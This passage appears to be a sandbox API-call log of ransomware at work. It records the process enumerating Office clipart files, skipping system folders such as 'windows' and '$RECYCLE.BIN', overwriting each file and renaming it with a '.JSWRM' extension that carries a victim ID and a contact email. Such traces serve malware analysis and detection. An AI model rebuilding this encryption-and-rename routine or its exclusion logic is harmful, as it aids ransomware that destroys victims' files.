dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0099.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0099.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0099.187] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2054, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00482_.WMF", cAlternateFileName="")) returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2=".") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="..") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="...") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="windows") returned -1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="recovery") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="perflogs") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="documents and settings") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="system volume information") returned 1 [0099.187] lstrcmpiW (lpString1="TR00482_.WMF", lpString2="msocache") returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0099.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00482_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00482_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00482_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.187] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0099.187] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0099.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00482_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.187] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00482_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00482_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0099.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0099.188] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0099.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.188] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.188] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00482_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00482_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.188] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8276) returned 1 [0099.188] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.188] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2050) returned 0x205850 [0099.188] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x2050, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x2050, lpOverlapped=0x0) returned 1 [0099.190] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.190] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x2050, lpOverlapped=0x0) returned 1 [0099.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.191] CloseHandle (hObject=0x314) returned 1 [0099.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210748 [0099.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0099.191] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0099.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0099.191] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0099.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0099.191] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0099.191] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00482_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00482_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00482_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00482_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0099.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210748 | out: hHeap=0x1e0000) returned 1 [0099.192] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.192] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1800, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="TR00494_.WMF", cAlternateFileName="")) returned 1 [0099.192] lstrcmpiW (lpString1="TR00494_.WMF", lpString2=".") returned 1 [0099.192] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="..") returned 1 [0099.192] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="...") returned 1 [0099.193] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="windows") returned -1 [0099.193] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="recovery") returned 1 [0099.193] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="perflogs") returned 1 [0099.193] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="documents and settings") returned 1 [0099.193] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0099.193] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="system volume information") returned 1 [0099.193] lstrcmpiW (lpString1="TR00494_.WMF", lpString2="msocache") returned 1 [0099.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0099.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00494_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00494_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00494_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0099.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0099.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00494_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="TR00494_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TR00494_.WMF", lpUsedDefaultChar=0x0) returned 12 [0099.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0099.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.193] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0099.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.193] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.193] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0099.193] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00494_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00494_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.194] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6144) returned 1 [0099.194] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.194] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1800) returned 0x205850 [0099.194] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1800, lpOverlapped=0x0) returned 1 [0099.196] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.196] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1800, lpOverlapped=0x0) returned 1 [0099.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0099.196] CloseHandle (hObject=0x314) returned 1 [0099.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0099.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.196] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.196] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.196] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0099.197] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a378 | out: hHeap=0x1e0000) returned 1 [0099.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0099.197] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0099.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0099.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.197] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00494_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00494_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TR00494_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tr00494_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0099.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0099.197] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0099.197] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x342e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="URBAN_01.MID", cAlternateFileName="")) returned 1 [0099.197] lstrcmpiW (lpString1="URBAN_01.MID", lpString2=".") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="..") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="...") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="windows") returned -1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="recovery") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="perflogs") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="documents and settings") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="system volume information") returned 1 [0099.198] lstrcmpiW (lpString1="URBAN_01.MID", lpString2="msocache") returned 1 [0099.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0099.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URBAN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URBAN_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URBAN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0099.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0099.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0099.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URBAN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="URBAN_01.MID", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="URBAN_01.MID", lpUsedDefaultChar=0x0) returned 12 [0099.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0099.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.198] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.198] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.198] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0099.198] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\urban_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.199] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13358) returned 1 [0099.199] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.199] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3420) returned 0x24d210 [0099.199] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3420, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3420, lpOverlapped=0x0) returned 1 [0099.202] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.202] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3420, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3420, lpOverlapped=0x0) returned 1 [0099.202] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0099.202] CloseHandle (hObject=0x314) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0099.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0099.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0099.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0099.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a228 [0099.203] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a228, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a228 | out: hHeap=0x1e0000) returned 1 [0099.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0099.203] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0099.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0099.203] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0099.203] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\URBAN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\urban_01.mid"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\URBAN_01.MID.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\urban_01.mid.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0099.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0099.204] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0099.204] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1361, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="VCTRN_01.MID", cAlternateFileName="")) returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2=".") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="..") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="...") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="windows") returned -1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="recovery") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="perflogs") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="documents and settings") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="$RECYCLE.BIN") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="system volume information") returned 1 [0099.204] lstrcmpiW (lpString1="VCTRN_01.MID", lpString2="msocache") returned 1 [0099.204] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0099.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VCTRN_01.MID", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.204] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="VCTRN_01.MID", cchWideChar=12, lpMultiByteStr=0x345ebd8, 